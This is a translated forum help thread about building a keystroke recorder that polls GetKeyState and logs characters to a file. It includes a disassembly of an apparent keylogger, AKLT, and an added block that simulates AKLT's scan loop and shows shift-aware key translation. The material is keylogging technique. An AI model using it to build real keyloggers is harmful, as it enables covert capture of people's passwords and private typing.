[Help] Capturing keystrokes with GetKeyState: how to make it accurate?
2011-3-31 13:54 4769
I create a thread and loop calling GetKeyState to capture keys, but there is a problem: pressing one character gets it recorded N times.
How can this be made general, so that each character is recorded once?
Right now it is Sleep(10), sleeping 10 milliseconds, and the results are terrible.
#include <windows.h>

// The stop flag and the two helpers live elsewhere in the poster's code (not shown in the post).
extern volatile BOOL Flag;                        // cleared by the main thread to stop the loop
char PressKey(void);                              // polls GetKeyState and returns the pressed character
void KeyWrite(const char *path, const char *ch);  // appends one character to the log file

DWORD WINAPI ThreadProc(LPVOID lpParam)
{
		(void)lpParam;
		do 
		{
			Sleep(10);
			//OutputDebugString("Enter");
			char a = 0;
			a = PressKey();
			//OutputDebugString(&a);   // 'a' is a single char, not a string: debug use only
			
			KeyWrite("c:\\1.log", &a);
			
		} while (Flag);
		return 0;   // returning from the thread function ends the thread; ExitThread() is not needed
}

Latest replies (7)
#2 nfgfgo 2011-3-31 15:30
...there is also the smart pop-up kind.
#3 demoscene 2011-3-31 16:24
Seems like this works:
#include <stdio.h>
#include <windows.h>

int main(void)
{
	int i = 0;
	while (1)   /* busy loop: spins a full core, no Sleep between polls */
	{
		/* low bit = "pressed since the last call" */
		if (GetAsyncKeyState(VK_SHIFT) & 0x1)
		{
			i++;
			printf("shift Pressed %d!\r\n", i);
		}
	}
	return 0;
}

But MSDN does not recommend using it this way, because if another program calls GetAsyncKeyState it affects the value GetAsyncKeyState returns to you:
Although the least significant bit of the return value indicates whether the key has been pressed since the last query, 
due to the pre-emptive multitasking nature of Windows, another application can call 
GetAsyncKeyState and receive the "recently pressed" bit instead of your application. 
The behavior of the least significant bit of the return value is retained strictly for compatibility 
with 16-bit Windows applications (which are non-preemptive) and should not be relied upon.
#4 竹君 2011-3-31 16:46
What do you mean, smart pop-up?
#5 竹君 2011-3-31 22:13
Nobody bumping this? AKLT uses GetKeyState and manages to be accurate. But it cannot handle upper/lower case or special characters. I traced it in OD and found that it also just does Sleep 10ms.
#6 竹君 2011-3-31 22:50
00402C7F   .  C64424 08 01  mov     byte ptr [esp+8], 1
00402C84   >  C74424 0C 000>mov     dword ptr [esp+C], 0
00402C8C   >  B8 FF000000   mov     eax, 0FF
00402C91   .  3B4424 0C     cmp     eax, dword ptr [esp+C]
00402C95   .  0F8C 65010000 jl      00402E00
00402C9B   .  E8 6A5C0100   call    <jmp.&USER32.GetForegroundWindow>; [GetForegroundWindow
00402CA0   .  894424 10     mov     dword ptr [esp+10], eax
00402CA4   .  FF7424 0C     push    dword ptr [esp+C]                ; /Key
00402CA8   .  E8 8D5C0100   call    <jmp.&USER32.GetKeyState>        ; \GetKeyState
00402CAD   .  89C3          mov     ebx, eax
00402CAF   .  81E3 00400000 and     ebx, 4000
00402CB5   .  21DB          and     ebx, ebx
00402CB7   .  0F84 19010000 je      00402DD6
00402CBD   .  68 02000000   push    2                                ; /Action = 2
00402CC2   .  FF7424 10     push    dword ptr [esp+10]               ; |Key
00402CC6   .  E8 455C0100   call    <jmp.&USER32.MapVirtualKeyA>     ; \MapVirtualKeyA
00402CCB   .  880424        mov     byte ptr [esp], al
00402CCE   .  FF35 24B14200 push    dword ptr [42B124]
00402CD4   .  68 0E000000   push    0E
00402CD9   .  E8 521D0100   call    00414A30
00402CDE   .  83EC 04       sub     esp, 4
00402CE1   .  8D4C24 08     lea     ecx, dword ptr [esp+8]
00402CE5   .  5A            pop     edx
00402CE6   .  E8 15130000   call    00404000
00402CEB   .  FF35 24B14200 push    dword ptr [42B124]
00402CF1   .  8B5424 08     mov     edx, dword ptr [esp+8]
00402CF5   .  FF35 24B14200 push    dword ptr [42B124]
00402CFB   .  E8 10560100   call    00418310
00402D00   .  FF35 24B14200 push    dword ptr [42B124]
00402D06   .  0FB64424 0C   movzx   eax, byte ptr [esp+C]
00402D0B   .  50            push    eax
00402D0C   .  E8 6F150000   call    00404280
00402D11   .  83EC 04       sub     esp, 4
00402D14   .  58            pop     eax
00402D15   .  FF05 24B14200 inc     dword ptr [42B124]
00402D1B   .  68 0E000000   push    0E
00402D20   .  8B15 C4724200 mov     edx, dword ptr [4272C4]
00402D26   .  015424 04     add     dword ptr [esp+4], edx
00402D2A   .  E8 61170100   call    00414490
00402D2F   .  8F05 24B14200 pop     dword ptr [42B124]
00402D35   .  803D DAA74200>cmp     byte ptr [42A7DA], 0
00402D3C   .  74 04         je      short 00402D42
00402D3E   .  31C0          xor     eax, eax
00402D40   .  EB 05         jmp     short 00402D47
00402D42   >  B8 01000000   mov     eax, 1
00402D47   >  21C0          and     eax, eax
00402D49   .  0F84 87000000 je      00402DD6
00402D4F   .  8B1D C4A74200 mov     ebx, dword ptr [42A7C4]
00402D55   .  3B5C24 10     cmp     ebx, dword ptr [esp+10]
00402D59   .  74 7B         je      short 00402DD6
00402D5B   .  FF7424 04     push    dword ptr [esp+4]
00402D5F   .  E8 FC140000   call    00404260
00402D64   .  89C3          mov     ebx, eax
00402D66   .  21DB          and     ebx, ebx
00402D68   .  7E 41         jle     short 00402DAB
00402D6A   .  FF35 24B14200 push    dword ptr [42B124]
00402D70   .  FF35 24B14200 push    dword ptr [42B124]
00402D76   .  0FB64424 08   movzx   eax, byte ptr [esp+8]
00402D7B   .  50            push    eax
00402D7C   .  E8 FF140000   call    00404280
00402D81   .  83EC 04       sub     esp, 4
00402D84   .  FF05 24B14200 inc     dword ptr [42B124]
00402D8A   .  8B15 C4724200 mov     edx, dword ptr [4272C4]
00402D90   .  011424        add     dword ptr [esp], edx
00402D93   .  E8 C8140000   call    00404260
00402D98   .  8F05 24B14200 pop     dword ptr [42B124]
00402D9E   .  89C3          mov     ebx, eax
00402DA0   .  21DB          and     ebx, ebx
00402DA2   .  7E 07         jle     short 00402DAB
00402DA4   .  B8 01000000   mov     eax, 1
00402DA9   .  EB 02         jmp     short 00402DAD
00402DAB   >  31C0          xor     eax, eax
00402DAD   >  21C0          and     eax, eax
00402DAF   .  74 25         je      short 00402DD6
00402DB1   .  68 01000000   push    1
00402DB6   .  68 16000000   push    16
00402DBB   .  E8 201C0100   call    004149E0
00402DC0   .  68 00000000   push    0
00402DC5   .  68 18000000   push    18
00402DCA   .  E8 111C0100   call    004149E0
00402DCF   .  C605 DAA74200>mov     byte ptr [42A7DA], 1
00402DD6   >  FF7424 0C     push    dword ptr [esp+C]                ; /Key
00402DDA   .  E8 5B5B0100   call    <jmp.&USER32.GetKeyState>        ; \GetKeyState
00402DDF   .  89C3          mov     ebx, eax
00402DE1   .  81E3 00400000 and     ebx, 4000
00402DE7   .  21DB          and     ebx, ebx
00402DE9   .  74 0C         je      short 00402DF7
00402DEB   .  68 0A000000   push    0A                               ; /Timeout = 10. ms
00402DF0   .  E8 6F120000   call    <jmp.&KERNEL32.Sleep>            ; \Sleep
00402DF5   .^ EB DF         jmp     short 00402DD6
00402DF7   >  FF4424 0C     inc     dword ptr [esp+C]
00402DFB   .^ E9 8CFEFFFF   jmp     00402C8C
00402E00   >  68 0A000000   push    0A                               ; /Timeout = 10. ms
00402E05   .  E8 5A120000   call    <jmp.&KERNEL32.Sleep>            ; \Sleep
00402E0A   .^ E9 75FEFFFF   jmp     00402C84
00402E0F   .  31C0          xor     eax, eax
00402E11   .  FF7424 04     push    dword ptr [esp+4]
00402E15   .  E8 56550100   call    00418370
00402E1A   .  83C4 14       add     esp, 14
00402E1D   .  5B            pop     ebx
00402E1E   .  C3            retn
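What the listing shows is a serial scan: for each virtual key 0..0xFF it calls GetKeyState, and when the key is down it converts it with MapVirtualKeyA(key, 2), records it, then parks in the loop at 00402DD6 calling Sleep(10) until that same key is released before it moves on to the next key; after key 0xFF it sleeps once more (00402E00) and rescans. That release wait is why AKLT does not log a held key repeatedly, and it also explains the two limits seen in post #5: MapVirtualKeyA with MAPVK_VK_TO_CHAR (2) returns the unshifted character, so Shift and Caps Lock are invisible to it, and any key pressed and released while the loop is parked on another key is gone by the time the scan reaches it. The block below is an added example written for this thread, not AKLT's code or the poster's: it rewrites that loop in C against a constructed key timeline (scripted holds, not captured input), and the Windows-only part shows a shift-aware translation. One thing it does not reproduce: the listing masks GetKeyState's result with 0x4000, whereas the documented down flag of its SHORT return value is the high-order bit (0x8000); the simulation uses a scripted down state, so nothing here depends on that mask.

```c
/* AKLT's loop as recovered from the listing above, rewritten in C and run
 * on a constructed timeline (added example, not AKLT's or the poster's code). */
#include <stdio.h>
#include <string.h>

#define NUM_VKEYS 256

/* One key held from down_tick up to (not including) up_tick; one tick is
 * one Sleep(10). Constructed data, not captured keystrokes. */
typedef struct { int vk; int down_tick; int up_tick; } hold;

/* Physical state of 'vk' at tick t, standing in for GetKeyState's down bit. */
static int scripted_down(const hold *h, int n, int vk, int t)
{
    for (int i = 0; i < n; i++)
        if (h[i].vk == vk && t >= h[i].down_tick && t < h[i].up_tick) return 1;
    return 0;
}

/* One pass of the loop at 00402C8C..00402DFB: for vk = 0..255, if the key is
 * down, translate and log it, then Sleep(10) until it is released before
 * moving on to vk+1. After vk 255 (00402E00) Sleep(10) and rescan.
 * Digit keys are used so MapVirtualKeyA(vk, 2) is simply (char)vk.
 * Returns the new log length; *tick is the simulated clock. */
int aklt_scan_once(const hold *h, int n, int *tick, char *log, int cap, int len)
{
    for (int vk = 0; vk < NUM_VKEYS; vk++) {
        if (!scripted_down(h, n, vk, *tick)) continue;
        if (len < cap - 1) log[len++] = (char)vk;
        while (scripted_down(h, n, vk, *tick)) (*tick)++;   /* 00402DD6 wait loop */
    }
    (*tick)++;                                              /* 00402E00 Sleep */
    return len;
}

/* Run scans until end_tick; the logged characters land in 'log'. */
int aklt_run(const hold *h, int n, int end_tick, char *log, int cap)
{
    int tick = 0, len = 0;
    while (tick < end_tick) len = aklt_scan_once(h, n, &tick, log, cap, len);
    log[len] = '\0';
    return len;
}

/* Rollover case: '8' is pressed and released while '7' is still held, i.e.
 * while the loop is parked in the wait-for-release spin on '7'. */
int demo_rollover_log(char *log, int cap)
{
    const hold timeline[] = {
        { 0x37, 0, 3 },   /* '7' held ticks 0..2 */
        { 0x38, 1, 2 },   /* '8' tapped at tick 1, released before '7' is */
        { 0x39, 4, 6 },   /* '9' held ticks 4..5, after both are up */
    };
    return aklt_run(timeline, 3, 8, log, cap);
}

/* Convenience for checking the simulated log against an expected string. */
int demo_rollover_matches(const char *expected)
{
    char log[16];
    demo_rollover_log(log, sizeof log);
    return strcmp(log, expected) == 0;
}

#ifdef _WIN32
#include <windows.h>
/* Why the listing's MapVirtualKeyA(vk, 2) (MAPVK_VK_TO_CHAR) cannot tell 'a'
 * from 'A' or '1' from '!': it maps the key on its own, ignoring Shift and
 * Caps Lock. ToUnicode applies the modifier state it is handed, so build that
 * state from the live modifiers. Caveat: ToUnicode can disturb the layout's
 * dead-key state; acceptable for a demo. Returns the number of WCHARs written. */
int vk_to_text(UINT vk, WCHAR *out, int cap)
{
    BYTE state[256];
    memset(state, 0, sizeof state);
    if (GetAsyncKeyState(VK_SHIFT)   & 0x8000) state[VK_SHIFT]   = 0x80;
    if (GetAsyncKeyState(VK_CONTROL) & 0x8000) state[VK_CONTROL] = 0x80;
    if (GetAsyncKeyState(VK_MENU)    & 0x8000) state[VK_MENU]    = 0x80;
    if (GetKeyState(VK_CAPITAL) & 0x0001)      state[VK_CAPITAL] = 0x01; /* toggle bit */
    UINT sc = MapVirtualKeyA(vk, 0);   /* 0 = MAPVK_VK_TO_VSC */
    return ToUnicode(vk, sc, state, out, cap, 0);
}
#endif

int main(void)
{
    char log[16];
    demo_rollover_log(log, sizeof log);
    printf("AKLT-style scan logged \"%s\"; the '8' typed during the '7' wait is lost\n", log);
    return 0;
}
```

The simulated log comes out as "79": the scan is parked on '7' from tick 0 to tick 3, and by the time it reaches virtual key 0x38 the '8' is already up. That is the same shape as the "12345679" lines in post #8, and it is a property of any scheme that waits for one key's release before looking at the others.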

#7 竹君 2011-4-1 14:38
GetKeyState and GetAsyncKeyState are so unreliable. What gets recorded is a complete mess.
#8 竹君 2011-4-1 14:54
12345679
12345679
1234679
12346789
12346789
That is what GetKeyState recorded for five consecutive entries of 123456789. But why does AKLT not get it wrong, or rather, why is its error rate so low?


Any forum brothers who have a good method or have looked into this, please help explain.
Attachment:
  • 2.jpg (89.17kb, 54 downloads)